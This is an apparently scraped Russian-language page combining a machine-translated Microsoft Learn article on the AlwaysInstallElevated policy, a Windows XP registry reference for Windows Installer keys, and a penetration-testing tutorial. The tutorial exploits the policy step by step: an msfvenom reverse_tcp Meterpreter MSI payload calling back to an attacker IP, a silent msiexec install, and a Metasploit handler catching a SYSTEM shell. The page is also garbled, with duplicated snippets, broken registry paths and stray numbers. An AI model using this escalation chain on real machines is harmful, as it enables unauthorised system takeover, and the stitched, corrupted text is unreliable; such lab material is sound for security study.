Разное

Alwaysinstallelevated в 1: AlwaysInstallElevated — Win32 apps | Microsoft Learn

AlwaysInstallElevated — Win32 apps | Microsoft Learn

Twitter LinkedIn Facebook Адрес электронной почты

  • Статья
  • Чтение занимает 2 мин

Политику AlwaysInstallElevated можно использовать для установки пакета установщика Windows с повышенными привилегиями (систем).

**Предупреждение: **

Этот вариант эквивалентен предоставлению полных административных прав, что может представлять огромный риск безопасности. Корпорация Майкрософт настоятельно не рекомендует использовать этот параметр.

Чтобы установить пакет с повышенными привилегиями (системные), задайте для параметра AlwaysInstallElevated значение 1 в обоих следующих разделах реестра:

HKEY_CURRENT_USER\Программного обеспечения\Политики\Microsoft\\ Windows Installer

HKEY_LOCAL_MACHINE\Программного обеспечения\Политики\Microsoft\\ Windows Installer

Если для значения AlwaysInstallElevated не задано значение 1 в обоих предыдущих разделах реестра, установщик использует повышенные привилегии для установки управляемых приложений и использует уровень привилегий текущего пользователя для неуправляемых приложений.

Так как эта политика позволяет пользователям устанавливать приложения, которым требуется доступ к каталогам и разделам реестра, для которых у пользователя может не быть разрешения на просмотр или изменение, следует рассмотреть вопрос о том, предоставляет ли он пользователям соответствующий уровень безопасности. Установка этой политики направляет установщик Windows использовать системные разрешения при установке приложения в системе. Если эта политика не задана, приложения, не распространяемые администратором, устанавливаются с помощью привилегий пользователя, и только управляемые приложения получают повышенные привилегии.

Обратите внимание, что после включения политики для каждого компьютера для AlwaysInstallElevated любой пользователь может задать свой параметр для каждого пользователя.

Сведения о взаимодействии этой политики с источниками установки см. в разделе «Управление источниками установки».

REG_DWORD

 

 

WindowsAccessoriesWindows Installer.

Справочник по реестру Windows XP

WindowsAccessoriesWindows Installer

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallPCHealth\UninstallString

Если в командной строке запустить значение данного параметра rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 %SystemRoot%InfPCHealth.inf можно удалить программу PC Health вместе с MSConfig (освободив порядка 25 Мб). Запустить справку Windows по F1 после этого, вы уже не сможете.

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesMSIServer\ImagePath

Если, при попытке установить или удалить программу в Windows XP, выдается сообщение об ошибке: «Error 1719. не удаётся получить доступ к службе „Windows installer“. Либо Windows работает в защищённом режиме, либо служба „Windows installer“ установлена неправильно», то данный сбой может возникнуть при установке или удалении программ, использующих Windows Installer, дистрибутив которых представлен в виде MSI-файла (Microsoft Software Installation).

Удостоверьтесь, что в значении данного параметра указан правильный путь к файлу msiexec.exe. По умолчанию параметр имеет

Значение: %SystemRoot%System32msiexec.exe /V

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup\LogLevel

При установке Windows можно заставить установщик вести подробный протокол, который можно будет использовать для диагностики проблем задав данному параметру значение 0хFFF. Очевидно, что при инсталляции Windows редактор реестра будет недоступен, поэтому придется отредактировать файл установки, чтобы он сам создал требуемую переменную. Для этого в дистрибутиве Windows откройте папку I386 и найдите файл Hivesft.inf. Откройте его при помощи любого текстового редактора и найдите строку HKLM,»SOFTWAREMicrosoftWindowsCurrentVersionSetup»,»DriverCachePath»,0x00020002,»%SystemRoot%Driver Cache», сразу под этой строчкой добавьте следующую строку HKLM,»SOFTWAREMicrosoftWindowsCurrentVersionSetup», «LogLevel»,0x00010003,0xFFFF, обратите внимание, что эти два параметра должны располагаться каждый на отдельной строке.

Теперь подробный отчет об установке будет вестись в файле Setupapi.log.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\AlwaysInstallElevated

Bceгдa пpoизвoдить уcтaнoвку c пoвышeнными пpивилeгиями. Требует от установщика Windows, чтобы он использовал системные разрешения при установке любой программы на этой системе. ВНИМАНИЕ= Устанавливать данный параметр необходио как для кoмпьютepa так и для пoльзoвaтeля.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.

HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller\AlwaysInstallElevated

Bceгдa пpoизвoдить уcтaнoвку c пoвышeнными пpивилeгиями. Требует от установщика Windows, чтобы он использовал системные разрешения при установке любой программы на этой системе. ВНИМАНИЕ= Устанавливать данный параметр необходио как для кoмпьютepa так и для пoльзoвaтeля.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.

HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller\SearchOrder

Пopядoк пoиcкa уcтaнoвoчныx фaйлoв. Задает порядок, в котором установщик Windows Installer выполняет поиск установочных файлов. По умолчанию, Windows Installer сначала выполняет поиск в сети, затем на съемных носителях (дискетах, компакт-дисках или DVD), и наконец, в Интернете (URL). Чтобы изменить порядок выполнения поиска, следует включить этот параметр, а затем ввести следующие буквы, представляющие вышеперечисленные источники файлов, в том порядке, в котором установщику Windows Installer следует выполнять поиск:

«n» соответствует локальной сети;

«m» соответствует съемным носителям;

«u» соответствует URL, или Интернету.

Чтобы исключить один из этих источников файлов, следует пропустить или удалить букву, соответствующую этому типу источника.

Тип: REGSZ;

Значение: (по умолчанию параметра нет) Групповая политика.

HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller\DisableRollback

Зaпpeтить oткaт при установке. Запрещает установщику Windows Installer создавать и сохранять файлы, нужные для восстановления исходного состояния после прерванной или неудачной установки.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.

HKEY_CURRENT_USERSoftwarePoliciesMicrosoftWindowsInstaller\DisableMedia

Зaпpeтить иcпoльзoвaниe cъeмныx нocитeлeй пpи уcтaнoвкe.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisableMSI

Отключение Windows Installer.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = тoлькo для нe oбcлуживaeмыx пpoгpaмм; 2 = отключить)

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisableRollback

Зaпpeтить oткaт при установке. Запрещает установщику Windows Installer создавать и сохранять файлы, нужные для восстановления исходного состояния после прерванной или неудачной установки.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisableBrowse

Запрещает пользователям осуществлять поиск файлов установки во время добавления новых возможностей или компонентов установленных программ.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisablePatch

Запрещает пользователям использовать «Установщик Windows» для установки пакетов исправлений.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = запретить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\SafeForScripting

Позволяет программам, использующим веб-технологии, устанавливать программное обеспечение на этом компьютере без уведомления пользователя об этом.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\EnableUserControl

Разрешает пользователям изменять параметры установки, которые обычно доступны только администраторам.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\AllowLockdownBrowse

Разрешает пользователям производить поиск исходных файлов во время привилегированных установок.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\AllowLockdownMedia

Разрешает пользователям устанавливать во время привилегированных установок программы со съемных носителей, таких как дискеты и компакт-диски.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\AllowLockdownPatch

Разрешает пользователям производить обновление программ во время привилегированных установок.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\EnableAdminTSRemote

Удаленная установка и настройка программного обеспечения с помощью Windows Installer.

Тип: REGDWORD;

Значение: (0 = отключить; 1 = включить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\TransformsSecure

Сохраняет копии файлов трансформации в безопасном месте на локальном компьютере.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = включить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\DisableUserInstalls

Зaпpeтить уcтaнoвки для пoльзoвaтeлeй.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 0 = рaзpeшить уcтaнoвки для пoльзoвaтeй; 1 = скpыть уcтaнoвки для пoльзoвaтeлeй; 2 = зaпpeтить уcтaнoвки для пoльзoвaтeлей) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\LimitSystemRestoreCheckpointing

Oтключить coздaниe кoнтpoльныx тoчeк вoccтaнoвлeния cиcтeмы.

Тип: REGDWORD;

Значение: (по умолчанию параметра нет; 1 = отключить) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTSetup\SourcePath

Укaзaть pacпoлoжeниe уcтaнoвoчныx фaйлoв Windows.

Тип: REGSZ;

Значение: (по умолчанию параметра нет; путь к уcтaнoвoчным фaйлaм Windows) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows NTSetup\ServicePackSourcePath

Укaзaть paзмeщeниe уcтaнoвoчныx фaйлoв пaкeтa oбнoвлeния Windows.

Тип: REGSZ;

Значение: (по умолчанию параметра нет; путь к уcтaнoвoчным фaйлaм пaкeтa oбнoвлeния Windows) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller\Logging

Ведение подробного лога инсталлятора Windows. Для aктивизaции peжимa жуpнaлa выбepитe oдин из peжимoв. Иcпoльзoвaниe «iwearucmpvo» пoзвoлит зaнocить в жуpнaл вce coбытия, нo зaмeдлит уcтaнoвку.

Тип: REGSZ;

Значение: (i = cooбщeния cocтoяния; w = нe кpитичecкиe пpeдупpeждeния; e = вce cooбщeния oб oшибкax; a = зaпуcки дeйcтвий; r = зaпиcи, cпeцифичecкиe для дeйcтвия; u = зaпpocы пoльзoвaтeля; c = нaчaльныe пapaмeтpы интepфeйca пoльзoвaтeля; m = нexвaткa пaмяти; p = cвoйcтвa тepминaлa; v = пoдpoбный вывoд; o = cooбщeния o нexвaткe мecтa нa диcкe) Групповая политика.

HKEY_LOCAL_MACHINESOFTWAREClasses.inf\(default)

Чтобы INF файлы открывались в блокноте меняем значение параметра.

Тип: REGSZ;

Значение: (по умолчанию = inffile; в блокноте = txtfile)

AlwaysInstallElevated — приложения Win32 | Microsoft Узнайте

Редактировать

Твиттер LinkedIn Фейсбук Электронная почта

  • Статья
  • 2 минуты на чтение

Вы можете использовать политику AlwaysInstallElevated для установки пакета установщика Windows с повышенными (системными) привилегиями.

**Предупреждение:  **

Этот вариант эквивалентен предоставлению полных административных прав, что может представлять серьезную угрозу безопасности. Microsoft настоятельно не рекомендует использовать этот параметр.

Чтобы установить пакет с повышенными (системными) привилегиями, установите для параметра AlwaysInstallElevated значение «1» в обоих следующих разделах реестра: \ Установщик

HKEY_LOCAL_MACHINE \ Программное обеспечение \ Политики \ Microsoft \ Windows \ Установитель

, если всегда используется не установлена. повышенные привилегии для установки управляемых приложений и использует уровень привилегий текущего пользователя для неуправляемых приложений.

Поскольку эта политика разрешает пользователям устанавливать приложения, которым требуется доступ к каталогам и разделам реестра, для которых у пользователя может не быть разрешения на просмотр или изменение, вам следует подумать, обеспечивает ли она вашим пользователям надлежащий уровень безопасности. Установка этой политики предписывает установщику Windows использовать системные разрешения при установке приложения в системе. Если эта политика не задана, приложения, не распространяемые администратором, устанавливаются с использованием привилегий пользователя, и только управляемые приложения получают повышенные привилегии.

Обратите внимание, что после включения политики для каждой машины для AlwaysInstallElevated любой пользователь может установить свои настройки для каждого пользователя.

Сведения о взаимодействии этой политики с источниками установки см. в разделе Управление источниками установки.

REG_DWORD

 

 

Повышение привилегий Windows (AlwaysInstallElevated) | Анастасис Василеядис

Привет друзья!! В этой статье мы демонстрируем метод повышения привилегий Windows с помощью метода Политика AlwaysInstallElevated . При тестировании на проникновение, когда мы запускаем командную оболочку в качестве локального пользователя, можно использовать уязвимые функции (или параметры конфигурации) групповой политики Windows, чтобы дополнительно повысить их до прав администратора и получить доступ администратора

Содержание

  • Введение
  • Лабораторная установка
  • Создать командную оболочку от имени локального пользователя
  • Повышение привилегий вручную с помощью полезной нагрузки . msi (MSfvenom)
  • Повышение привилегий с помощью добавления группы администраторов пользователей (Msfvenom)
  • Повышение привилегий с помощью Post-эксплойта (Metasploit)

Введение

AlwaysInstallElevated Policy

Поскольку установщик Windows поставляется с установленной политикой Windows, все мы знаем, что

движок, который используется пакетами MSI для установки приложений. Эти пакеты MSI могут быть установлены с повышенными привилегиями для пользователей без прав администратора

Для этой цели функция политики AlwaysInstallElevated используется для установки файла пакета MSI с повышенными (системными) привилегиями. Эта политика, если она включена в редакторе локальной групповой политики; предписывает механизму установки Windows использовать повышенные разрешения при установке любой программы в системе. Этот метод может сделать машину уязвимой, что создает высокий риск для безопасности, поскольку пользователь, не являющийся администратором, может запускать установки с повышенными привилегиями и получать доступ ко многим безопасным местам на компьютере.

Внимание! Примечание: Этот параметр эквивалентен предоставлению полных административных прав, что может представлять серьезную угрозу безопасности. Microsoft настоятельно не рекомендует использовать этот параметр. Следовательно, это следует использовать только для целей лаборатории (а не в производственной среде)

Настройка лаборатории

Компьютер жертвы: Windows 7

Компьютер злоумышленника: Kali Linux

Чтобы сделать эту политику эффективной [т.е. пакет с повышенными (системными) привилегиями], нам нужно убедиться, что машина-жертва преднамеренно сделана уязвимой, включив AlwaysInstalledElevated Политика в папках «Конфигурация компьютера» и «Конфигурация пользователя» редактора локальной групповой политики

Для конфигурации Windows Откроется окно редактора локальной групповой политики

  1. Изменение параметров политики AlwaysInstalledElevated
  2. Для конфигурации компьютера

Перейдите к приведенному пути в Windows Machine

Конфигурация компьютера \ Административные шаблоны \ Компоненты Windows \ Windows Installer

Включить Всегда установка с поднятыми привилегиями

Для пользовательской конфигурации

9003

для Пользовательской конфигурации

9003

для Пользовательской конфигурации

777 указанный ниже путь на компьютере с Windows

Конфигурация пользователя\Административные шаблоны\Компоненты Windows\Установщик Windows

Включите Всегда устанавливайте с повышенными привилегиями

На этом лабораторная установка на компьютере с Windows завершена. Теперь давайте перейдем к нашей актуальной задаче.

Создание машины жертвы

Нам нужно хотя бы один раз скомпрометировать машину жертвы Windows, чтобы получить сеанс meterpreter. Как вы можете заметить, у нас уже есть сеанс metrepreter жертвы. Откроем msfconsole и проверим существующие текущие сессии

msfconsole
sessions

1

2

msfconsole

session

Как мы видим, уже существует сеанс с ID 1 . Теперь давайте откроем сеанс 1 и извлечем данные пользователя

meterpreter > session 1
meterpreter >getuid

1

2

meterpreter >sessions 1

meterpreter >getuid

Как мы видим, что мы есть вошел в этот сеанс с именем пользователя raj.

Примечание: Существующий пользователь «raj» уже существует на компьютере-жертве Windows 7 и не является пользователем-администратором

Теперь давайте откроем командную оболочку целевой машины

После выполнения команды оболочки мы попадем в папку «Загрузки» пользователя C:\Users\raj\Downloads

Теперь мы запустим команду запроса реестра в этой командной строке, чтобы проверить, имеет ли установщик Windows повышенные привилегии или нет, согласно нашим настройкам настроенным ранее

reg-запрос HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg-запрос HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

1

2

reg-запрос HKEY_CURRENT_USER\Microsoftware Windows\Installer

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

Как видно из вывода, реестр с именем «AlwaysInstallElevated» существует со значением двойного слова (REG_WORD) 0x1 , что означает, что включена политика AlwaysInstallElevated.

Повышение привилегий с помощью полезной нагрузки .msi (1-й метод)

Теперь давайте откроем новый терминал на машине Kali и сгенерируем файл пакета MSI ( 1.msi ), используя полезную нагрузку Windows Meterpreter следующим образом

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 –f msi > /root/Desktop/1.msi

1

msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4567 –f msi > /root/Рабочий стол/1.msi

В существующем сеансе Meterpreter пользователя давайте загрузим наш файл MSI с именем 1.msi на целевую машину следующим образом. После успешной загрузки мы перейдем к оболочке

upload /root/Desktop/1.msi .

1

загрузить /root/Desktop/1.msi .

Примечание: Перед выполнением файла пакета MSI запустите обработчик MSF в другом окне терминала

(см. команды для того же, после снимка экрана ниже)

Запустите файл пакета MSI в командной строке Windows

msiexec /quiet /qn /i 1. msi

1

msiexec /quiet /qn /i 1.msi

/quiet = подавление любых сообщений пользователь во время установки
/qn = без графического интерфейса
/i = обычная (в отличие от административной) установка

В параллельном окне мы открыли новый обработчик перед выполнением файла .msi

msf > использовать эксплойт/ multi/handler
эксплойт msf (обработчик) > установить полезную нагрузку windows/meterpreter/reverse_tcp
эксплойт msf (обработчик) > установить lhost 192.168.1.120
эксплойт MSF (обработчик) > set lport 4567
эксплойт MSF (обработчик) > эксплойт

1

2

3

4

5 900 use/mstif /handler

эксплойт MSF (обработчик) > установить полезную нагрузку windows/meterpreter/reverse_tcp

эксплойт MSF (обработчик) > установить lhost 192.168.1.120

эксплойт MSF (обработчик) > установить lport 4567

эксплойт MSF > эксплойт

Наконец-то мы получили сеанс meterpreter, используя этот эксплойт!! Давайте подробнее рассмотрим привилегии пользователя, которые мы получили в этой системе 9.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *